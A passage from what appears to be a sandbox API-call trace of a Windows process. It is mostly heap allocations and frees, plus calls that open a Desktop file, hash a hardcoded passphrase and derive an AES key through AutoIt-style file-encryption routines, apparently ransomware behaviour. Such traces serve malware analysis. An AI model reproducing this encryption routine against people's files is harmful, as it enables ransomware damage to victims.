lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.347] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.348] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.348] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0128.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0128.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0128.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0128.350] CloseHandle (hObject=0x258) returned 1 [0128.351] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.351] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0128.351] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7bbe40, ftCreationTime.dwHighDateTime=0x1d5e379, ftLastAccessTime.dwLowDateTime=0x31cf1480, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x31cf1480, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x36a1, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="xV3SDT.ots", cAlternateFileName="")) returned 0x41ac200 [0128.351] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0128.351] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0128.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0128.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0128.352] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0128.352] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0128.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.391] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0128.391] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.392] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0128.392] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.392] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0128.392] CryptHashData (hHash=0x41ac200, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0128.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.392] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0128.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0128.393] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0128.393] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0128.393] CryptDestroyHash (hHash=0x41ac200) returned 1 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0128.394] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0128.394] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0128.394] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0128.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.395] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\xv3sdt.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0128.395] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.395] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.395] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 